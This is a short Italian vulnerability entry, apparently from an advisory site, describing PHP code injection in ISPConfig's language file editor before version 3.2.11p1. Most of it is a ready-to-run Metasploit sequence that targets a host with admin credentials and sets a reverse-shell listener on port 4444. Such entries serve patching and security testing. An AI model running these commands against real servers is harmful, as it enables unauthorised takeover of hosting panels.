
Moduli Metasploit
Modulo Metasploit

use exploit/linux/http/ispconfig_language_edit
set RHOSTS target.com
set USERNAME admin
set PASSWORD password123
set LHOST 127.0.0.1
set LPORT 4444
exploit
È stato scoperto un problema in ISPConfig prima della versione 3.2.11p1. L'iniezione di codice PHP può essere ottenuta nell'editor dei file di lingua da un amministratore se admin_allow_langedit è abilitato.